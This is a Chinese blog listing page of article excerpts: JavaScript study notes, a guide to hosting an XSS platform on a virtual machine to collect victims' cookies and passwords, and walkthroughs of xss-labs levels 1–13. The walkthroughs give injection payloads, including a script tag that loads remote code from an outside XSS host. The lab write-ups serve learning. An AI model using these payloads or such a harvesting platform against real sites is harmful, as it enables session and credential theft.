![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
xss
ihszg
四舍五入两米高,取整去余一百斤,平时找bug挖漏洞,闲时与学妹吟诗作赋,乏时以太极养精蓄锐。偶尔也为部分游戏的Beta测试出力。这就是我,展现在人前的我
展开
-
JavaScript笔记总结(三)
事件原创 2020-07-09 17:07:37 · 1115 阅读 · 0 评论 -
JavaScript之我在正则表达式里踩的坑
在学习正则表达式的时候,突然翻车,代码如下:var str = "Visit Runoob!"; var str1= "/noo/i";document.write(str.search(str1));以为就是走个流程,然而懵了:输出结果是-1.半天也没找出错在哪里。然后误打误撞下整出了下面的代码:var str = "Visit Runoob!"; var str1= /noo/i;document.write(str.search(str1));咦,我又懵了,怎么居然就对了呢搞原创 2020-07-09 10:36:10 · 618 阅读 · 0 评论 -
JavaScript笔记总结(二)
文章目录语句JavaScript 代码块JavaScript 语句标识符变量数据类型字符串数字布尔数组对象声明变量类型函数带有返回值的函数局部 JavaScript 变量全局 JavaScript 变量JavaScript 变量的生存期语句JavaScript 语句是发给浏览器的命令,document.getElementById("123").innerHTML = "你好";// 向id="123" 的 HTML 元素输出文本 "你好"可以用分号分隔 JavaScript 语句。如:a原创 2020-07-08 20:51:19 · 595 阅读 · 0 评论 -
JavaScript 笔记总结(一)
文章目录JavaScriptJavaScript 语法函数对事件的反应改变 HTML 内容改变 HTML 图像改变 HTML 元素的样式验证输入JavaScript 输出JavaScriptJavaScript web 开发人员必须学习的 3 门语言中的一门:HTML 定义了网页的内容CSS 描述了网页的布局JavaScript 网页的行为什么是javascript?JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScri原创 2020-07-08 17:56:53 · 2325 阅读 · 0 评论 -
在虚拟机上搭建xss平台
目录1.将源码放进虚拟机2.更改配置文件3.创建数据库4.导入数据库5.修改域名6.添加.htaccess伪静态文件7.使用8.提权9.测试10.资源前言:在实施xss攻击的时候,需要有一个平台用来收集攻击获得猎物(cookie,用户名密码等),xss.me就是这样的一个平台。文末有链接1.将源码放进虚拟机2.更改配置文件进入应用根目录(不是网页根目录),找到config.php文件。主要改3个地方:数据库信息:账号密码要对,数据库名可以随便写一个注册信息:将invite改为normal(原创 2020-08-05 17:28:54 · 3321 阅读 · 1 评论 -
xss-labs第1~13关
文章目录伪重点第1关第2关第3关第4关第5关第6关第7关第8关第9关第10关第11关第12关第13关伪重点<script>alert(1);</script> //直接嵌入script<script src=https://xsspt.com/MQzN0Z></script> //从远程嵌入script<input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入scr原创 2020-08-04 17:10:22 · 2866 阅读 · 1 评论 -
XSS过关(二)6~10关 详细
第6关用前面的方法来试,发现href、script、on都被过滤了这时突然发现第6关1处“now you’re here”全是小写,2处的“Let’s go”首字母进行了大写。看到这里我就想起了大小写过滤然后成功过关,我也不知道这个是不是隐藏的线索"><a hRef=javascript:alert(1)>123第七关啥都试过了,不会没得法子,只有...原创 2020-04-05 20:20:49 · 546 阅读 · 0 评论 -
XSS过关(一) 1~5关 详细
最近在玩xss,就决定把思路写下来,以备忘第一关很简单,把test换成<script>alert(1)</script>就行<script>alert(1)</script>第二关也有些简单,找到注入点,发现input标签里的可用于是加上 "/> 以闭合value,再加上<script>alert(1)</...原创 2020-04-04 16:18:48 · 1021 阅读 · 0 评论